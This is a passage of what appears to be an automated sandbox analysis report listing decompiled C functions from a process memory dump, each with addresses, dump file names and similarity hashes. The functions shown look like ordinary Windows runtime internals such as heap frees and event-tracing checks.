                                                        Function 04964015, Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 86%
                                                        			E04964015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E048B2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E048B2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x49886ac);
					E0489F900(0x49886d4, _t28);
					E048AFFB0(0x49886ac, _t28, 0x49886ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E048AFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                        0x0496401a
                                                        0x0496401e
                                                        0x04964023
                                                        0x04964028
                                                        0x04964029
                                                        0x0496402b
                                                        0x0496402f
                                                        0x04964043
                                                        0x04964046
                                                        0x04964051
                                                        0x04964057
                                                        0x0496405f
                                                        0x04964062
                                                        0x04964067
                                                        0x0496406f
                                                        0x0496407c
                                                        0x0496407c
                                                        0x0496408c
                                                        0x0496408c
                                                        0x04964097

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5129c61246a3fdc4adbe6b24ba0c7c069110e5b971689907c6630267c70c9517
                                                        • Instruction ID: 5d969078662d7804c2fd2072193c1b48f2b163590f67451c401962c58d2674ac
                                                        • Opcode Fuzzy Hash: 5129c61246a3fdc4adbe6b24ba0c7c069110e5b971689907c6630267c70c9517
                                                        • Instruction Fuzzy Hash: DD018471241A457FE715BB6DCD84E53B7ACFF85658B000B29B608C7A11CBA4FC11C6E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 049514FB, Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 61%
                                                        			E049514FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x498d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E048DFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E048B7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E048DB640(E048D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                        0x049514fb
                                                        0x049514fb
                                                        0x0495150a
                                                        0x04951514
                                                        0x04951519
                                                        0x0495151b
                                                        0x04951526
                                                        0x0495152c
                                                        0x04951534
                                                        0x04951537
                                                        0x0495153a
                                                        0x04951545
                                                        0x04951557
                                                        0x04951547
                                                        0x04951550
                                                        0x04951550
                                                        0x04951562
                                                        0x04951563
                                                        0x04951565
                                                        0x0495156a
                                                        0x0495157f

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a9332421840446ea0658f8a6cac8d623d93ce12f162c7fccf666f5daad99e0ca
                                                        • Instruction ID: 33e982e7ecd986fb335476295ef520062edc810a5f3e5af99a6e532d8a5f24f1
                                                        • Opcode Fuzzy Hash: a9332421840446ea0658f8a6cac8d623d93ce12f162c7fccf666f5daad99e0ca
                                                        • Instruction Fuzzy Hash: 3C018071A01258AFDB04DF6CD842EAEBBB8EF44714F00456AF905EB280D674EA41CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0495138A, Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 61%
                                                        			E0495138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x498d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E048DFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E048B7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E048DB640(E048D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                        0x0495138a
                                                        0x0495138a
                                                        0x04951399
                                                        0x049513a3
                                                        0x049513a8
                                                        0x049513aa
                                                        0x049513b5
                                                        0x049513bb
                                                        0x049513c3
                                                        0x049513c6
                                                        0x049513c9
                                                        0x049513d4
                                                        0x049513e6
                                                        0x049513d6
                                                        0x049513df
                                                        0x049513df
                                                        0x049513f1
                                                        0x049513f2
                                                        0x049513f4
                                                        0x049513f9
                                                        0x0495140e

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fad4d89c570283e34f3d29e9da53f29419d027405770ce84a34aa9bd63a68ffd
                                                        • Instruction ID: 0608e6231609952b522196aaf14a2edad627be8c830c4a23b9fb22ab3be56f63
                                                        • Opcode Fuzzy Hash: fad4d89c570283e34f3d29e9da53f29419d027405770ce84a34aa9bd63a68ffd
                                                        • Instruction Fuzzy Hash: 02019271E01218AFDB04DFACD842FAEBBB8EF44714F00456AF900EB380D6B4AA40C791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048958EC, Relevance: .0, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 91%
                                                        			E048958EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x498d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x4875c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E04895943() != 0 &&  *0x4985320 > 5) {
					E04917B5E( &_v44, _t27);
					_t22 =  &_v28;
					E04917B5E( &_v28, _t28);
					_t11 = E04917B9C(0x4985320, 0x487bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E048DB640(_t11, _t17, _v8 ^ _t29, 0x487bf15, _t27, _t28);
			}















                                                        0x048958fb
                                                        0x048958fe
                                                        0x04895906
                                                        0x0489590a
                                                        0x0489593c
                                                        0x0489593c
                                                        0x0489590c
                                                        0x0489590c
                                                        0x04895911
                                                        0x00000000
                                                        0x04895913
                                                        0x04895913
                                                        0x04895913
                                                        0x04895911
                                                        0x0489591d
                                                        0x048f1035
                                                        0x048f103c
                                                        0x048f103f
                                                        0x048f1056
                                                        0x048f1056
                                                        0x0489593b

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 327c72abd020b55bc528f32e5fb2fac84d74096c99258af2e3db43144ae020ac
                                                        • Instruction ID: 8ca27b1bee3278ee6e62455bd9d28136a83af1785e736ad5d5aa2c3414b709cc
                                                        • Opcode Fuzzy Hash: 327c72abd020b55bc528f32e5fb2fac84d74096c99258af2e3db43144ae020ac
                                                        • Instruction Fuzzy Hash: 7801D432B00508EBFB16EA69EC009AE77E8EB84238F8906BDD905E7240DF30FD05C650
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0494FEC0, Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 59%
                                                        			E0494FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x498d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E048DFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E048B7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E048DB640(E048D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                        0x0494fec0
                                                        0x0494fec0
                                                        0x0494fecf
                                                        0x0494fed9
                                                        0x0494fede
                                                        0x0494fee0
                                                        0x0494feeb
                                                        0x0494fef3
                                                        0x0494fef6
                                                        0x0494fef9
                                                        0x0494ff04
                                                        0x0494ff16
                                                        0x0494ff06
                                                        0x0494ff0f
                                                        0x0494ff0f
                                                        0x0494ff21
                                                        0x0494ff22
                                                        0x0494ff24
                                                        0x0494ff29
                                                        0x0494ff3e

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c081bb66fa7b079f0be90f490890bc70cae2e7b9061499d588a7213c2ade52e8
                                                        • Instruction ID: 469f11d1830385c35a3eb81cdffdb5731841ea37db7113f6626e328f0e38a23a
                                                        • Opcode Fuzzy Hash: c081bb66fa7b079f0be90f490890bc70cae2e7b9061499d588a7213c2ade52e8
                                                        • Instruction Fuzzy Hash: 1101D871E01218AFD714DB6CD845FAEB7B8EF44704F044566F900DB380DA74AD00C795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0494FE3F, Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 59%
                                                        			E0494FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x498d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E048DFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E048B7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E048DB640(E048D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                        0x0494fe3f
                                                        0x0494fe3f
                                                        0x0494fe4e
                                                        0x0494fe58
                                                        0x0494fe5d
                                                        0x0494fe5f
                                                        0x0494fe6a
                                                        0x0494fe72
                                                        0x0494fe75
                                                        0x0494fe78
                                                        0x0494fe83
                                                        0x0494fe95
                                                        0x0494fe85
                                                        0x0494fe8e
                                                        0x0494fe8e
                                                        0x0494fea0
                                                        0x0494fea1
                                                        0x0494fea3
                                                        0x0494fea8
                                                        0x0494febd

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 60ac89689971328cd3b5e680628244d3295c6876622da8e75502adc28ffd0d01
                                                        • Instruction ID: c9bfa734084cfe6af0ea5f1445605e3eb50e986e36cdb319cbb9ca5422472923
                                                        • Opcode Fuzzy Hash: 60ac89689971328cd3b5e680628244d3295c6876622da8e75502adc28ffd0d01
                                                        • Instruction Fuzzy Hash: 4401B571A01218ABD714DB68D805EAEBBB8EF40704F004566F900DB280DA74AA00C795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048AB02A, Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048AB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E048B7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04917016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                        0x048ab037
                                                        0x048ab039
                                                        0x048ab03b
                                                        0x048ab040
                                                        0x048fa60e
                                                        0x00000000
                                                        0x00000000
                                                        0x048fa61d
                                                        0x048ab04b
                                                        0x048ab04e
                                                        0x048fa627
                                                        0x048fa634
                                                        0x00000000
                                                        0x00000000
                                                        0x048fa641
                                                        0x048fa653
                                                        0x048fa643
                                                        0x048fa64c
                                                        0x048fa64c
                                                        0x048fa65b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048fa66c
                                                        0x048ab057
                                                        0x048ab057
                                                        0x048ab057
                                                        0x048ab046
                                                        0x048ab046
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                        • Instruction ID: 1ae79b21bbabbde2805cd94c68d641d8253ac4270c6d5598bea6d1bf41bf884f
                                                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                        • Instruction Fuzzy Hash: 5B01D4313006849FE326D75CC884F6677D8EB45764F094AB1FA19CB651D669FC40C220
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04961074, Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E04961074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0496165E(__ebx, 0x4988ae4, (__edx -  *0x4988b04 >> 0x14) + (__edx -  *0x4988b04 >> 0x14), __edi, __ecx, (__edx -  *0x4988b04 >> 0x14) + (__edx -  *0x4988b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0495AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E048B7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0494FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                        0x04961074
                                                        0x04961080
                                                        0x04961082
                                                        0x0496108a
                                                        0x0496108f
                                                        0x04961093
                                                        0x049610ab
                                                        0x049610ab
                                                        0x049610c3
                                                        0x049610cf
                                                        0x049610e1
                                                        0x049610d1
                                                        0x049610da
                                                        0x049610da
                                                        0x049610e9
                                                        0x049610f5
                                                        0x049610f5
                                                        0x049610fe

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fda01baa476e2f293a3b55b84faac0800e5608c29331bfb66a09af43f80ef9b1
                                                        • Instruction ID: ae2672ea663884ba04ddc5d03224808fd4ad7b9fa26abf11793adc6cda2b6adc
                                                        • Opcode Fuzzy Hash: fda01baa476e2f293a3b55b84faac0800e5608c29331bfb66a09af43f80ef9b1
                                                        • Instruction Fuzzy Hash: ED0147726047819FDB10EF69C905B1A77E9ABC4314F048A39F886C3690EE30F940CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04968ED6, Relevance: .0, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 54%
                                                        			E04968ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x498d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E048B7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E048DB640(E048D9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                        0x04968ed6
                                                        0x04968ee5
                                                        0x04968eed
                                                        0x04968ef0
                                                        0x04968efa
                                                        0x04968f03
                                                        0x04968f0c
                                                        0x04968f15
                                                        0x04968f24
                                                        0x04968f27
                                                        0x04968f31
                                                        0x04968f43
                                                        0x04968f33
                                                        0x04968f3c
                                                        0x04968f3c
                                                        0x04968f4e
                                                        0x04968f4f
                                                        0x04968f51
                                                        0x04968f56
                                                        0x04968f69

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 74f0a6ebb58dc8f94a26a6e036005bd921d375b2fec5c8fb1ce418842a0ae0d8
                                                        • Instruction ID: c6f6ca1ca1b40bd46f6895a97c7fb7bbe1461f9fc04ce5992af6645556575058
                                                        • Opcode Fuzzy Hash: 74f0a6ebb58dc8f94a26a6e036005bd921d375b2fec5c8fb1ce418842a0ae0d8
                                                        • Instruction Fuzzy Hash: 50111E70E052599FDB04DFA9D441BAEBBF4FF08304F0446BAE519EB382E674A940CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04968A62, Relevance: .0, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 54%
                                                        			E04968A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x498d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E048B7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E048DB640(E048D9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                        0x04968a62
                                                        0x04968a71
                                                        0x04968a79
                                                        0x04968a82
                                                        0x04968a85
                                                        0x04968a89
                                                        0x04968a8c
                                                        0x04968a8f
                                                        0x04968a92
                                                        0x04968a95
                                                        0x04968a9f
                                                        0x04968ab1
                                                        0x04968aa1
                                                        0x04968aaa
                                                        0x04968aaa
                                                        0x04968abc
                                                        0x04968abd
                                                        0x04968abf
                                                        0x04968ac4
                                                        0x04968ada

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2480171770d8b3ad6329847cc5ebed08f06e10ceaa165da4afdbb131238764da
                                                        • Instruction ID: a3aa7bcd234863f6a536612e7d1752074d6a8679e56264c62a66cf4474392629
                                                        • Opcode Fuzzy Hash: 2480171770d8b3ad6329847cc5ebed08f06e10ceaa165da4afdbb131238764da
                                                        • Instruction Fuzzy Hash: 91012CB1A0121CAFDB04DFA9D9419EEBBB8EF48314F10456AF905E7341E674A900CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0489DB60, Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0489DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0489DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0489E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0489E8B0(__ecx, _t14, 0xfff);
							L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                        0x0489db64
                                                        0x0489db66
                                                        0x0489db6b
                                                        0x0489dbaa
                                                        0x0489db71
                                                        0x0489db76
                                                        0x0489db7a
                                                        0x0489dba3
                                                        0x0489db7c
                                                        0x0489db87
                                                        0x0489db8b
                                                        0x048f4fa1
                                                        0x048f4fb3
                                                        0x048f4fb8
                                                        0x0489db91
                                                        0x0489db96
                                                        0x0489db98
                                                        0x0489db98
                                                        0x0489db8b
                                                        0x0489db7a
                                                        0x0489db9d
                                                        0x0489dba2

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                        • Instruction ID: 19e19c1130787d9a795ab825811e2b457a0c9cb55fdeb08d3b3cfaa0fb816fe1
                                                        • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                        • Instruction Fuzzy Hash: EAF0FC33201E229FEB725A994890F67B6D58FC1B68F1D0E35F505EB344CBB0AC0296D9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0489B1E1, Relevance: .0, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0489B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E048B7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E048B7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04917016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                        0x0489b1e8
                                                        0x0489b1ea
                                                        0x0489b1f3
                                                        0x048f4a17
                                                        0x0489b1f9
                                                        0x0489b1f9
                                                        0x0489b1f9
                                                        0x0489b201
                                                        0x048f4a21
                                                        0x048f4a2e
                                                        0x00000000
                                                        0x00000000
                                                        0x048f4a3b
                                                        0x048f4a4d
                                                        0x048f4a3d
                                                        0x048f4a46
                                                        0x048f4a46
                                                        0x048f4a55
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0489b20a
                                                        0x0489b20a
                                                        0x0489b20a
                                                        0x0489b20a

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
